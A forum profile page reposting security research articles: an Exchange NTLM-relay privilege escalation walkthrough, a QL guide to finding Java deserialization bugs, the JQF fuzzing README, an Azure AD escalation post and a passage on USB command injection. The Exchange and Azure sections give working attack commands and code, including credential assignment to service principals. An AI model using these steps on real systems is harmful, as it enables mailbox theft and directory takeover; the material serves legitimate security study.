Everything posted by Nytro

1. Microsoft Exchange – Privilege Escalation
September 16, 2019 | Red Team | CVE-2018-8581, Microsoft Exchange, NTLM Relay, Privilege Escalation, PushSubscription

Harvesting the credentials of a domain user during a red team operation can lead to execution of arbitrary code, persistence and domain escalation. However, information stored in emails can be highly sensitive for an organisation, so threat actors may focus on exfiltrating data from emails. This can be achieved either by adding a rule to the mailbox of a target user that forwards emails to an inbox the attacker controls, or by delegating access to a mailbox to their Exchange account.

Dustin Childs from the Zero Day Initiative discovered a vulnerability in Microsoft Exchange that could allow an attacker to impersonate a target account. The vulnerability exists because, by design, Microsoft Exchange allows any user to specify a URL for a push subscription, and Exchange will send notifications to that URL. NTLM hashes are leaked in the process and can be used to authenticate to Exchange Web Services via NTLM relay. The technical details of the vulnerability have been covered on the Zero Day Initiative blog.

Email Forwarding

Accessing the compromised account from the Outlook Web Access (OWA) portal and selecting the permissions of the inbox folder will open a new window containing the permissions of the mailbox.

[Figure: Inbox Permissions]

The target account should be added with permissions over the mailbox. This is required in order to retrieve the SID (Security Identifier) of the account.

[Figure: Add Permissions for the Target Account]

Opening the Network console in the browser and browsing a mailbox folder will generate a request to the Microsoft Exchange server.

[Figure: POST Request to Microsoft Exchange]

Examining the HTTP response of the request will unveil the SID of the Administrator account.
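As a small aside, pulling the SID out of that HTTP response can be automated. The sketch below is purely illustrative: the response fragment is invented (real OWA responses are much larger JSON documents), but the SID always has the standard S-1-5-21-... form, so a simple pattern match is enough.

```python
import re

# Hedged illustration: extract the Administrator SID from a captured OWA
# response body. The fragment below is an invented example.
body = ('{"PrimarySmtpAddress":"administrator@corp.local",'
        '"Sid":"S-1-5-21-1234567890-1234567890-1234567890-500"}')

match = re.search(r"S-1-5-21(?:-\d+)+", body)
sid = match.group(0) if match else None
```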
[Figure: Administrator SID]

The implementation of this attack requires two Python scripts from the Zero Day Initiative GitHub repository. The serverHTTP_relayNTLM.py script requires the SID of the Administrator that was retrieved, the IP address of the Exchange server with the target port, and the compromised email account that the red team controls.

[Figure: serverHTTP_relayNTLM Script Configuration]

Once the script has the correct values, it can be executed in order to start a relay server:

python serverHTTP_relayNTLM.py

[Figure: Relay Server]

Exch_EWS_pushSubscribe.py requires the domain credentials and domain of the compromised account and the IP address of the relay server.

[Figure: Push Subscribe Script Configuration]

Executing the script will attempt to send the pushSubscribe requests to Exchange via EWS (Exchange Web Services):

python Exch_EWS_pushSubscribe.py

[Figure: pushSubscribe Python Script]
[Figure: Exchange XML Response]

The NTLM hash of the Administrator will be relayed back to the Microsoft Exchange server.

[Figure: Relay Administrator NTLM]
[Figure: Relay Administrator NTLM to Exchange]

Emails that are sent to the mailbox of the target account (Administrator) will be forwarded automatically to the mailbox under the control of the red team.

[Figure: Email to Target Account]

The email will be forwarded to the inbox of the account that the red team controls.

[Figure: Email Forwarded Automatically]

A rule has been created on the target account, using NTLM relay to authenticate to Exchange, that forwards all email messages to another inbox. This can be validated by checking the inbox rules of the target account.

[Figure: Rule – Forward Admin Emails]

Delegate Access

Microsoft Exchange users can connect their account (Outlook or OWA) to other mailboxes (delegate access) if they have the necessary permissions assigned. Attempting to open the mailbox of another account directly without permissions will produce the following error.
[Figure: Open Another Mailbox – No Permissions]

There is a Python script which exploits the same vulnerability but, instead of adding a forwarding rule, assigns the account permissions to access any mailbox in the domain, including that of a domain administrator. The script requires valid credentials, the IP address of the Exchange server and the target email account.

[Figure: Script Configuration]

Executing the script will attempt to perform the elevation:

python2 CVE-2018-8581.py

[Figure: Privilege Escalation Script]

Once the script has finished, a message will inform the user that the mailbox of the target account can be viewed via Outlook or the Outlook Web Access portal.

[Figure: Privilege Escalation Script – Delegation Complete]

Authentication with Outlook Web Access is needed in order to view the delegated mailbox.

[Figure: Outlook Web Access Authentication]

Outlook Web Access has functionality which allows an Exchange user to open the mailbox of another account if they have permissions.

[Figure: Open Another Mailbox]

The following window will appear on the screen.

[Figure: Open Another Mailbox Window]

The mailbox of the Administrator will open in another tab, confirming the elevation of privileges.

References

https://www.zerodayinitiative.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-microsoft-exchange
https://github.com/thezdi/PoC/tree/master/CVE-2018-8581
https://github.com/WyAtu/CVE-2018-8581

Source: https://pentestlab.blog/2019/09/16/microsoft-exchange-privilege-escalation/
2. Finding Insecure Deserialization in Java
By: Semmle Team | September 12, 2019 | Video Transcription

Last year, one of our security researchers, Mo, discovered an unsafe deserialization vulnerability in Apache Struts. It turned out to allow remote code execution, and it was also part of the default configuration for Struts, so this was a pretty high impact vulnerability. Today, I'm going to show you how to find unsafe deserialization vulnerabilities using QL.

You can see here that I've got a copy of QL for Eclipse. I have a snapshot of Struts from August last year, which includes the vulnerability, loaded up, and I'm going to walk you through the process of finding that vulnerability with QL. To start, I'm just going to look for all of the places in the code where we potentially perform deserialization: I'm interested in calls where the thing being called has the name fromXML. We've got two results here, and we can jump to the source code in the snapshot to see that these are both calls to fromXML.

Now, this is not necessarily enough for these to be vulnerable. In addition to just doing the deserialization, the user has to be able to control the value that's being passed into fromXML. This is a pretty typical type of problem: when you're doing variant analysis, you have some value that is potentially user controlled, and you want to know if it reaches a dangerous operation. Semmle provides a library that allows you to do a dataflow analysis. I've just pulled that in with these imports here, and that's what I'm going to use to decide, for each of these fromXML calls, whether it is really vulnerable or okay.

The first thing I need to do is define a data flow configuration that tells us what the sources are that the user might be able to control, and what the sinks are (in this case, the arguments to fromXML). There's a little bit of boilerplate here while I set this up.
Then the information I need to provide here is what the sources are, so this is how I do that. We're going to say something is a source if it's a kind of RemoteFlowSource. This is a class provided by Semmle; it covers a lot of the standard ways that an end user can control a value in a Java application, including things like all of the web server annotations that you'll be familiar with. Of course, if you want to add your own sources or customize that, you can put whatever you want in here.

Now I'm going to do the same for the sinks. We said earlier that anything that gets passed into fromXML is potentially dangerous, so we say something is a sink if there is a call to fromXML and one of the arguments to that call is our sink.

I've written my configuration, and now I can go ahead and actually use it in the query. What I'm going to do here is get the flow config, a path node that is the source, and a path node that is the sink. The only condition I'm going to impose on these is that, under the configuration that I gave, there is flow from the source to the sink. Then I'm going to return the source, which says where we should send the user when they click on this result. I'm additionally going to give the source and the sink, which tells it to provide a bit of context for this result and show how data gets between these two things, and finally a message to display.

I can now run that. Okay, that's finished, and we've got two results here. You can see the first one is in test code, so I'll skip over that, and we can take a look at the second result. The source, as you can see, is a request (an HttpServletRequest) and its input stream, and that is something that's likely to be user controlled. Up here on the right, we've got this path explorer.
This actually shows us all of the steps we go through to get from this source to the sink, which is the argument to fromXML. We start with the input stream here; you can see it gets wrapped in a reader and then passed into this toObject method. We move to the next stage: here we've got the parameter of toObject on the XStream handler, and going back we can see that the handler is a content type handler. If you can send a request which is going to be handled by the XStream handler, then you can pass whatever data you want into this fromXML method, and that will allow you to get remote code execution with an appropriately crafted request.

So that shows you how to write a simple query that will find vulnerabilities like this. You can see that it's easy to modify if you have your own sources (maybe you've got a custom web server or something like that), or if you want to customize the sinks to look for other types of deserialization. You can tweak this even further, adding things like barriers for sanitization, to really customize it as much as you want and make sure it gives you great results.

Source: https://blog.semmle.com/insecure-deserialization-java/
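As a recap of the idea behind the query: the analysis treats the program as a graph of "data flows from A to B" edges and asks whether any user-controlled source reaches the fromXML sink. A toy sketch of that reachability question (plain Python, not QL; the edge names are invented to mirror the Struts example):

```python
# Toy model of source-to-sink taint reachability. Each key flows to each
# of the nodes in its list; names are invented for illustration.
flows = {
    "request.getInputStream": ["toObject"],   # servlet input wrapped, passed on
    "toObject": ["XStreamHandler.fromXML"],   # handler deserializes the stream
    "localConfig.read": ["parseSettings"],    # a flow that never hits the sink
}

def reaches(node, target, seen=frozenset()):
    """Depth-first search over the flow edges."""
    if node == target:
        return True
    return any(reaches(nxt, target, seen | {node})
               for nxt in flows.get(node, []) if nxt not in seen)

sources = ["request.getInputStream", "localConfig.read"]
tainted = [s for s in sources if reaches(s, "XStreamHandler.fromXML")]
```

Real dataflow engines add interprocedural steps, sanitizer barriers and path reconstruction on top of this basic reachability check.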
3. JQF + Zest: Semantic Fuzzing for Java

JQF is a feedback-directed fuzz testing platform for Java, which uses the abstraction of property-based testing. JQF is built on top of junit-quickcheck: a tool for generating random arguments for parametric JUnit test methods. JQF enables better input generation using coverage-guided fuzzing algorithms such as Zest.

Zest is an algorithm that biases coverage-guided fuzzing towards producing semantically valid inputs; that is, inputs that satisfy structural and semantic properties while maximizing code coverage. Zest's goal is to find deep semantic bugs that cannot be found by conventional fuzzing tools, which mostly stress error-handling logic only. By default, JQF runs Zest via the simple command: mvn jqf:fuzz.

JQF is a modular framework, supporting the following pluggable fuzzing front-ends, called guidances:
- Binary fuzzing with AFL (tutorial)
- Semantic fuzzing with Zest [ISSTA'19 paper] (tutorial 1) (tutorial 2)
- Complexity fuzzing with PerfFuzz [ISSTA'18 paper]

JQF has been successful in discovering a number of bugs in widely used open-source software such as OpenJDK, Apache Maven and the Google Closure Compiler.

Zest Research Paper

To reference Zest in your research, we request that you cite our ISSTA'19 paper:

Rohan Padhye, Caroline Lemieux, Koushik Sen, Mike Papadakis, and Yves Le Traon. 2019. Semantic Fuzzing with Zest. In Proceedings of the 28th ACM SIGSOFT International Symposium on Software Testing and Analysis (ISSTA '19), July 15–19, 2019, Beijing, China. ACM, New York, NY, USA, 12 pages. https://doi.org/10.1145/3293882.3330576

JQF Tool Paper

If you are using the JQF framework to build new fuzzers, we request that you cite our ISSTA'19 tool paper as follows:

Rohan Padhye, Caroline Lemieux, and Koushik Sen. 2019. JQF: Coverage-Guided Property-Based Testing in Java. In Proceedings of the 28th ACM SIGSOFT International Symposium on Software Testing and Analysis (ISSTA '19), July 15–19, 2019, Beijing, China.
ACM, New York, NY, USA, 4 pages. https://doi.org/10.1145/3293882.3339002

Overview

What is structured fuzzing?

Binary fuzzing tools like AFL and libFuzzer treat the input as a sequence of bytes. If the test program expects highly structured inputs, such as XML documents or JavaScript programs, then mutating byte arrays often results in syntactically invalid inputs; the core of the test program remains untested. Structured fuzzing tools leverage domain-specific knowledge of the input format to produce inputs that are syntactically valid by construction. Here is a nice article on structure-aware fuzzing of C++ programs using libFuzzer.

What is generator-based fuzzing (QuickCheck)?

Structured fuzzing tools need a way to understand the input structure. Some tools use declarative specifications of the input format, such as context-free grammars or protocol buffers. JQF uses QuickCheck's imperative approach for specifying the space of inputs: arbitrary generator programs whose job is to generate a single random input. A Generator<T> provides a method for producing random instances of type T. For example, a generator for type Calendar returns randomly-generated Calendar objects. One can easily write generators for more complex types, such as XML documents, JavaScript programs, JVM class files, SQL queries, HTTP requests, and many more; this is generator-based fuzzing. However, simply sampling random inputs of type T is not usually very effective, since the generator does not know if the inputs that it produces are any good.

What is semantic fuzzing (Zest)?

JQF supports the Zest algorithm, which uses code-coverage and input-validity feedback to bias a QuickCheck-style generator towards generating structured inputs that can reveal deep semantic bugs. JQF extracts code coverage using bytecode instrumentation, and input validity using JUnit's Assume API. An input is valid if no assumptions are violated.
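The generator + validity split can be sketched in a few lines. This is an illustrative toy in Python, not JQF itself: a generator produces random structured inputs, and the property is only checked on semantically valid ones, mirroring how a violated Assume causes JQF to skip an input rather than fail.

```python
import random

# Toy generator: deliberately over-approximates and may emit an invalid
# day/month pair, just like a naive structured-input generator.
def generate_date(rng):
    return rng.randint(1, 31), rng.randint(1, 13)

def is_valid(day, month):
    days_in_month = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
    return 1 <= month <= 12 and day <= days_in_month[month - 1]

rng = random.Random(0)
valid = 0
for _ in range(1000):
    day, month = generate_date(rng)
    if not is_valid(day, month):
        continue  # analogous to a violated Assume: skip, don't fail
    valid += 1
    assert 1 <= day <= 31  # the "property" under test
```

Zest goes further than this sketch by feeding coverage and validity information back into the generator's random choices, so that valid, coverage-increasing inputs are produced more often.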
Documentation

Tutorials
- Zest 101: A basic tutorial for fuzzing a standalone toy program using command-line scripts. Walks through the process of writing a test driver and structured input generator for Calendar objects.
- Fuzzing a compiler with Zest: A tutorial for fuzzing a non-trivial program, the Google Closure Compiler, using a generator for JavaScript programs. This tutorial makes use of the JQF Maven plugin.
- Fuzzing with AFL: A tutorial for fuzzing a Java program that parses binary data, such as PNG image files, using the AFL binary fuzzing engine.
- Fuzzing with ZestCLI: A tutorial for fuzzing a Java program with ZestCLI.

Continuous Fuzzing

Just like unit tests, fuzzing is best run continuously in your CI as your code grows and develops. Currently there is one service that offers continuous fuzzing as a service based on JQF/Zest: fuzzit.dev (tutorial).

Additional Details

The JQF wiki contains lots more documentation, including:
- Using a custom fuzz guidance
- Performance Benchmarks

JQF also publishes its API docs.

Contact the developers

We want your feedback! (haha, get it? get it?)

If you've found a bug in JQF or are having trouble getting JQF to work, please open an issue on the issue tracker. You can also use this platform to post feature requests. If it's some sort of fuzzing emergency, you can always send an email to the main developer: Rohan Padhye.

Trophies

If you find bugs with JQF and you are comfortable with sharing, we would be happy to add them to this list. Please send a PR for README.md with a link to the bug/CVE you found.
- google/closure-compiler#2842: IllegalStateException in VarCheck: Unexpected variable
- google/closure-compiler#2843: NullPointerException when using Arrow Functions in dead code
- google/closure-compiler#3173: Algorithmic complexity / performance issue on fuzzed input
- google/closure-compiler#3220: ExpressionDecomposer throws IllegalStateException: Object method calls can not be decomposed
- JDK-8190332: PngReader throws NegativeArraySizeException when width is too large
- JDK-8190511: PngReader throws OutOfMemoryError for very small malformed PNGs
- JDK-8190512: PngReader throws undocumented IllegalArgumentException: "Empty Region" instead of IOException for malformed images with negative dimensions
- JDK-8190997: PngReader throws NullPointerException when PLTE section is missing
- JDK-8191023: PngReader throws NegativeArraySizeException in parse_tEXt_chunk when keyword length exceeds chunk size
- JDK-8191076: PngReader throws NegativeArraySizeException in parse_zTXt_chunk when keyword length exceeds chunk size
- JDK-8191109: PngReader throws NegativeArraySizeException in parse_iCCP_chunk when keyword length exceeds chunk size
- JDK-8191174: PngReader throws undocumented IllegalArgumentException with message "Pixel stride times width must be <= scanline stride"
- JDK-8191073: JpegImageReader throws IndexOutOfBoundsException when reading malformed header
- JDK-8193444: SimpleDateFormat throws ArrayIndexOutOfBoundsException when format contains long sequences of unicode characters
- JDK-8193877: DateTimeFormatterBuilder throws ClassCastException when using padding
- mozilla/rhino#405: FAILED ASSERTION due to malformed destructuring syntax
- mozilla/rhino#406: ClassCastException when compiling malformed destructuring expression
- mozilla/rhino#407: java.lang.VerifyError in bytecode produced by CodeGen
- mozilla/rhino#409: ArrayIndexOutOfBoundsException when parsing '<!-'
- mozilla/rhino#410: NullPointerException in BodyCodeGen
- COLLECTIONS-714: PatriciaTrie ignores trailing null characters in keys
- COMPRESS-424: BZip2CompressorInputStream throws ArrayIndexOutOfBoundsException(s) when decompressing malformed input
- LANG-1385: StringIndexOutOfBoundsException in NumberUtils.createNumber
- CVE-2018-11771: Infinite Loop in Commons-Compress ZipArchiveInputStream (found by Tobias Ospelt)
- MNG-6375 / plexus-utils#34: NullPointerException when pom.xml has incomplete XML tag
- MNG-6374 / plexus-utils#35: ModelBuilder hangs with malformed pom.xml
- MNG-6577 / plexus-utils#57: Uncaught IllegalArgumentException when parsing unicode entity ref
- Bug 62655: Augment task: IllegalStateException when "id" attribute is missing
- BCEL-303: AssertionViolatedException in Pass 3A Verification of invoke instructions
- BCEL-307: ClassFormatException thrown in Pass 3A verification
- BCEL-308: NullPointerException in Verifier Pass 3A
- BCEL-309: NegativeArraySizeException when Code attribute length is negative
- BCEL-310: ArrayIndexOutOfBounds in Verifier Pass 3A
- BCEL-311: ClassCastException in Verifier Pass 2
- BCEL-312: AssertionViolation: INTERNAL ERROR Please adapt StringRepresentation to deal with ConstantPackage in Verifier Pass 2
- BCEL-313: ClassFormatException: Invalid signature: Ljava/lang/String)V in Verifier Pass 3A
- CVE-2018-8036: Infinite Loop leading to OOM in PDFBox's AFMParser (found by Tobias Ospelt)
- PDFBOX-4333: ClassCastException when loading PDF (found by Robin Schimpf)
- PDFBOX-4338: ArrayIndexOutOfBoundsException in COSParser (found by Robin Schimpf)
- PDFBOX-4339: NullPointerException in COSParser (found by Robin Schimpf)
- CVE-2018-8017: Infinite Loop in IptcAnpaParser
- CVE-2018-12418: Infinite Loop in junrar (found by Tobias Ospelt)

Source: https://github.com/rohanpadhye/jqf
4. Azure AD privilege escalation - Taking over default application permissions as Application Admin

During both my DEF CON and Troopers talks I mentioned a vulnerability that existed in Azure AD where an Application Admin or a compromised on-premise sync account could escalate privileges by assigning credentials to applications. When revisiting this topic, I found out the vulnerability was actually not fixed by Microsoft, and that there are still methods to escalate privileges using default Office 365 applications. In this blog I explain the why and how. The escalation is still possible since this behaviour is considered to be "by design" and thus remains a risk.

Applications and Service Principals

In Azure AD there is a distinction between Applications and Service Principals. An application is the configuration of an application, whereas the service principal is the security object that can actually have privileges in the Azure directory. This can be quite confusing, as in the documentation they are usually both called applications. The Azure portal makes it even more confusing by calling service principals "Enterprise Applications" and hiding most properties of the service principals from view. For Office 365 and other Microsoft applications, the application definition is present in one of Microsoft's dedicated Azure directories. In an Office 365 tenant, service principals are created for these applications automatically, giving an Office 365 Azure AD about 200 service principals by default, all with different pre-assigned permissions.

Application roles

Azure AD applications can define roles, which can then be assigned to users, groups or service principals. If you read the documentation for the Microsoft Graph permissions, you can see permissions such as Directory.Read.All. These are actually roles defined in the Microsoft Graph application, which can be assigned to service principals.
In the documentation and Azure portal, these roles are called "Application permissions", but we're sticking to the API terminology here. The roles defined in the Microsoft Graph application can be queried using the AzureAD PowerShell module.

[Screenshot: querying Microsoft Graph roles]

When we try to query for applications that have been assigned one or more roles, we can see that in my test directory the appadmintest app has a few roles assigned (though it's not exactly clear which roles those are, since there are a lot of GUID references).

There is however no way to query within an Azure AD which roles have been assigned to default Microsoft applications, so to enumerate this we have to get a bit creative. An Application Administrator (or the on-premise sync account, if you are escalating from on-premise to the cloud) can assign credentials to an application, after which this application can log in using the OAuth2 client credentials grant flow. Assigning credentials is possible using PowerShell:

PS C:\> $sp = Get-AzureADServicePrincipal -searchstring "Microsoft StaffHub"
PS C:\> New-AzureADServicePrincipalPasswordCredential -objectid $sp.ObjectId -EndDate "31-12-2099 12:00:00" -StartDate "6-8-2018 13:37:00" -Value redactedpassword

CustomKeyIdentifier :
EndDate             : 31-12-2099 12:00:00
KeyId               :
StartDate           : 6-8-2018 13:37:00
Value               : redactedpassword

After which we can log in using some Python code and have a look at the issued access token.
This JWT displays the roles the application has in the Microsoft Graph:

import requests
import json
import jwt
import pprint

# This should include the tenant name/id
AUTHORITY_URL = 'https://login.microsoftonline.com/ericsengines.onmicrosoft.com'
TOKEN_ENDPOINT = '/oauth2/token'

data = {'client_id': 'aa580612-c342-4ace-9055-8edee43ccb89',
        'resource': 'https://graph.microsoft.com',
        'client_secret': 'redactedpassword',
        'grant_type': 'client_credentials'}

r = requests.post(AUTHORITY_URL + TOKEN_ENDPOINT, data=data)
data2 = r.json()
try:
    jwtdata = jwt.decode(data2['access_token'], verify=False)
    pprint.pprint(jwtdata)
except KeyError:
    pass

This will print the data from the token, containing the "roles" field:

{
  "aio": "42FgYJg946pl8aLnJXPOnn4zTe/mBwA=",
  "app_displayname": "Microsoft StaffHub",
  "appid": "aa580612-c342-4ace-9055-8edee43ccb89",
  "appidacr": "1",
  "aud": "https://graph.microsoft.com",
  "exp": 1567200473,
  "iat": 1567171373,
  "idp": "https://sts.windows.net/50ad18e1-bb23-4466-9154-bc92e7fe3fbb/",
  "iss": "https://sts.windows.net/50ad18e1-bb23-4466-9154-bc92e7fe3fbb/",
  "nbf": 1567171373,
  "oid": "56748bde-f24d-4a5b-aa2d-c88b175dfc80",
  "roles": ["Directory.ReadWrite.All", "Mail.Read", "Group.Read.All", "Files.Read.All", "Group.ReadWrite.All"],
  "sub": "56748bde-f24d-4a5b-aa2d-c88b175dfc80",
  "tid": "50ad18e1-bb23-4466-9154-bc92e7fe3fbb",
  "uti": "2GScBJopwk2e3EFce7pgAA",
  "ver": "1.0",
  "xms_tcdt": 1559139940
}

This method only seemed to work for the Microsoft Graph (and not for the Azure AD Graph). I am unsure if this is because no apps have permissions on the Azure AD Graph or if the system used for these permissions is different. If we perform this action for all ~200 default apps in an Office 365 tenant, we get an overview of all the permissions these applications have. Below is an overview of the most interesting permissions that I've identified.
Application name                      | AppId                                | Access
Microsoft Forms                       | c9a559d2-7aab-4f13-a6ed-e7e9c52aec87 | Sites.ReadWrite.All
Microsoft Forms                       | c9a559d2-7aab-4f13-a6ed-e7e9c52aec87 | Files.ReadWrite.All
Microsoft Cloud App Security          | 05a65629-4c1b-48c1-a78b-804c4abdd4af | Sites.ReadWrite.All
Microsoft Cloud App Security          | 05a65629-4c1b-48c1-a78b-804c4abdd4af | Sites.FullControl.All
Microsoft Cloud App Security          | 05a65629-4c1b-48c1-a78b-804c4abdd4af | Files.ReadWrite.All
Microsoft Cloud App Security          | 05a65629-4c1b-48c1-a78b-804c4abdd4af | Group.ReadWrite.All
Microsoft Cloud App Security          | 05a65629-4c1b-48c1-a78b-804c4abdd4af | User.ReadWrite.All
Microsoft Cloud App Security          | 05a65629-4c1b-48c1-a78b-804c4abdd4af | IdentityRiskyUser.ReadWrite.All
Microsoft Teams                       | 1fec8e78-bce4-4aaf-ab1b-5451cc387264 | Sites.ReadWrite.All
Microsoft StaffHub                    | aa580612-c342-4ace-9055-8edee43ccb89 | Directory.ReadWrite.All
Microsoft StaffHub                    | aa580612-c342-4ace-9055-8edee43ccb89 | Group.ReadWrite.All
Microsoft.Azure.SyncFabric            | 00000014-0000-0000-c000-000000000000 | Group.ReadWrite.All
Microsoft Teams Services              | cc15fd57-2c6c-4117-a88c-83b1d56b4bbe | Sites.ReadWrite.All
Microsoft Teams Services              | cc15fd57-2c6c-4117-a88c-83b1d56b4bbe | Group.ReadWrite.All
Office 365 Exchange Online            | 00000002-0000-0ff1-ce00-000000000000 | Group.ReadWrite.All
Microsoft Office 365 Portal           | 00000006-0000-0ff1-ce00-000000000000 | User.ReadWrite.All
Microsoft Office 365 Portal           | 00000006-0000-0ff1-ce00-000000000000 | AuditLog.Read.All
Azure AD Identity Governance Insights | 58c746b0-a0b0-4647-a8f6-12dde5981638 | AuditLog.Read.All
Kaizala Sync Service                  | d82073ec-4d7c-4851-9c5d-5d97a911d71d | Group.ReadWrite.All

So the TL;DR is that if you compromise an Application Administrator account or the on-premise sync account, you can read and modify directory settings, group memberships, user accounts, SharePoint sites and OneDrive files. This is done by assigning credentials to an existing service principal with these permissions and then impersonating these applications.
You can exploit this by assigning a password or certificate to a service principal and then logging in as that service principal. I use Python for logging in with a service principal password, since the PowerShell module doesn't support this (it does support certificates, but those are more complex to set up). The commands below show that when logged in as the service principal, we do have the power to modify group memberships (something the application admin normally doesn't have):

PS C:\> Add-AzureADGroupMember -RefObjectId 2730f622-db95-4b40-9be7-6d72b6c1dad4 -ObjectId 3cf7196f-9d57-48ee-8912-dbf50803a4d8
PS C:\> Get-AzureADGroupMember -ObjectId 3cf7196f-9d57-48ee-8912-dbf50803a4d8

ObjectId                             DisplayName UserPrincipalName                 UserType
--------                             ----------- -----------------                 --------
2730f622-db95-4b40-9be7-6d72b6c1dad4 Mark        mark@bobswrenches.onmicrosoft.com Member

In the Azure AD audit log, the actions are shown as performed by "Microsoft StaffHub", and thus nothing in the log indicates these actions were actually performed by the application administrator.

Thoughts and disclosure process

I don't really see why credentials can be assigned to default service principals this way, or what a possible legitimate purpose for this would be. In my opinion, it shouldn't be possible to assign credentials to first-party Microsoft applications. The Azure portal doesn't offer this option and does not display these "backdoor" service principal credentials, but APIs such as the Microsoft Graph and Azure AD Graph have no such limitations. When I reported the fact that a privilege escalation is still possible this way (even after I was told it was fixed last year), I got a reply back from MSRC stating that Application Administrators assigning credentials to applications and obtaining more rights is documented behaviour and thus not a vulnerability.
If you are administering an Azure AD environment, I recommend implementing checks for credentials being assigned to default service principals, and regularly reviewing who controls the credentials of applications with high privileges.

Updated: September 16, 2019

Source: https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/
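The check recommended in this post can be sketched as a simple filter over service principal records. This is a hedged illustration: the field names loosely follow the Microsoft Graph servicePrincipal resource but are assumptions here, and the sample records are invented. In practice you would feed it the output of a Graph or AzureAD PowerShell enumeration.

```python
# Hedged sketch: flag service principals that have password credentials
# assigned. Field names ("displayName", "passwordCredentials") mirror the
# Microsoft Graph servicePrincipal resource shape as an assumption.
def flag_credentialed(service_principals):
    return [sp["displayName"]
            for sp in service_principals
            if sp.get("passwordCredentials")]

# Invented sample records for illustration
sample = [
    {"displayName": "Microsoft StaffHub",
     "passwordCredentials": [{"keyId": "example-key-id"}]},
    {"displayName": "Microsoft Forms", "passwordCredentials": []},
]
flagged = flag_credentialed(sample)
```

Any first-party application that shows up in such a report deserves immediate investigation, since (as shown above) the portal will not surface these credentials.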
5. Command Injection with USB Peripherals
by Danny Rosseau | Aug 22, 2019

When this Project Zero report came out, I started thinking more about USB as an interesting attack surface for IoT devices. Many of these devices allow users to plug in a USB device and then perform some actions with it automatically, and that automatic functionality may be too trusting of the USB device. That post got filed away in my mind and mostly forgotten for a while, until an IoT device sporting a USB port showed up at my door. Sadly, I hadn't yet gotten the aforementioned Raspberry Pi Zero, and shipping would probably take longer than my attention span would allow, but a coworker mentioned that Android has ConfigFS support, so I decided to investigate that route instead. But let's back up a bit and set the scene.

I had discovered that the IoT device in question would automatically mount any USB mass storage device that was connected to it and, if certain properties on the device were set, would use those properties, unsanitized, to create the mount directory name. Furthermore, this mounting happened via a call to C's infamous system function: a malicious USB device could potentially set these properties in such a way as to get arbitrary command execution. Since the responsible daemon was running as root, this meant that I might be able to plug a USB device in, wait a couple of seconds, and then have command execution as root on the device. This naturally triggered my memories of all of those spy movies where the protagonist plugs something into a door's highly sophisticated lock, which makes a bunch of numbers flash on the LED screen, magically opens the door, and lets them succinctly claim "I'm in" in a cool tone. I wanted to do that.

I was fairly certain my attack would work, but I wasn't very familiar with turning my Android device into a custom USB peripheral, and searches were mostly lacking a solution.
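To make the vulnerability class concrete before diving into the Android setup: the bug is that an attacker-controlled USB property ends up interpolated, unsanitized, into a string handed to system(). A small Python illustration (the label, mount path and command here are invented for the example; the real daemon is C code):

```python
import shlex

# Attacker-chosen device property (e.g. a disk label) containing a shell
# command substitution payload.
label = "$(touch /tmp/haxxed)"

# What the vulnerable daemon effectively hands to system(): the shell
# expands the $() payload before mkdir ever runs.
vulnerable = "mkdir -p /mnt/usb_%s" % label

# A safer construction neutralizes shell metacharacters before
# interpolation (or avoids the shell entirely).
safe = "mkdir -p /mnt/usb_%s" % shlex.quote(label)
```

The robust fix is to skip the shell altogether (e.g. call mkdir(2) directly) or to reject labels that contain anything outside a strict allowlist.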
This post is intended to supplement those lacking internet searches. If you want to follow along at home, I'm using a rooted Nexus 5X device running the last Android version it supports: 8.1. I'm not sure how different things are in Android 9 land.

Android as a Mass Storage Device

For my purposes, I need my Android device to show up as a USB mass storage device with the following properties controlled by me: the product name string, the product model string, and the disk label. You can customize much more than that, but I don't care about the rest.

We'll start with what didn't work for me: I had a passing familiarity with ConfigFS and saw a /config/usb_gadget, so I figured I'd just use that to make a quick mass storage USB device using the ConfigFS method that I knew about. I wrote up a quick script to create all of the entries, but upon testing it I ran into this:

mkdir: '/config/usb_gadget/g1/functions/mass_storage.0': Function not implemented

I'm still not sure why that route didn't work, but apparently this method just isn't supported. I was stumped for a bit and started digging into the Android and Linux kernel source code before taking a step back. I didn't want to fall into the rabbit hole of reading obscure kernel code: I just wanted to /bin/touch /tmp/haxxed on this device and declare myself 1337. So I left kernel land for Android init land to see what the Android devs do to change USB functionality.

Taking a look at some Android init files here, you'll notice that there are two different .rc files for USB: init.usb.configfs.rc and init.usb.rc. Keen observers (see: people who actually clicked those links) will notice that each one has a check for the property sys.usb.configfs: if it is 1, the entries in init.usb.configfs.rc are used; otherwise the init.usb.rc entries are used. For me, sys.usb.configfs was 0, and I confirmed that things were being modified over in the /sys/class/android_usb directory, so I shifted my focus there.
I haven't gone back to investigate what would happen with sys.usb.configfs set to 1, so I'm not going to claim this is the only way to do this, but it is the way that worked for me.

Exploring Unknown Lands

Now that I've shifted my focus to the /sys/class/android_usb/android0 directory, let's explore it. I see the following:

bullhead:/sys/class/android_usb/android0 # ls
bDeviceClass            f_acm           f_ffs            f_rmnet      iManufacturer             power
bDeviceProtocol         f_audio         f_gps            f_rmnet_smd  iProduct                  remote_wakeup
bDeviceSubClass         f_audio_source  f_mass_storage   f_rndis      iSerial                   state
bcdDevice               f_ccid          f_midi           f_rndis_qc   idProduct                 subsystem
down_pm_qos_sample_sec  f_charging      f_mtp            f_serial     idVendor                  uevent
down_pm_qos_threshold   f_diag          f_ncm            f_uasp       idle_pc_rpm_no_int_secs   up_pm_qos_sample_sec
enable                  f_ecm           f_ptp            f_usb_mbim   pm_qos                    up_pm_qos_threshold
f_accessory             f_ecm_qc        f_qdss           functions    pm_qos_state

idVendor, idProduct, iProduct, iManufacturer, and f_mass_storage look slightly familiar. If you are familiar with ConfigFS, the contents of f_mass_storage also look similar to the contents of the mass_storage function:

bullhead:/sys/class/android_usb/android0 # ls f_mass_storage
device inquiry_string lun luns power subsystem uevent
bullhead:/sys/class/android_usb/android0 # ls f_mass_storage/lun
file nofua power ro uevent

It is at this point that, if I were a less honest person, I'd tell you I know what is going on here. I don't. My goal is just to hack the thing by making a malicious USB device, not to learn the inner workings of the Linux kernel and how Android sets itself up as a USB peripheral. I intend to go deeper into this later, and will perhaps write a more comprehensive blog post at that point. There are plenty of hints around the source code and on the device itself that help figure out how to use this directory. One thing I see happening in init.usb.rc all the time is this:

write /sys/class/android_usb/android0/enable 0
....
write /sys/class/android_usb/android0/functions ${sys.usb.config}
write /sys/class/android_usb/android0/enable 1

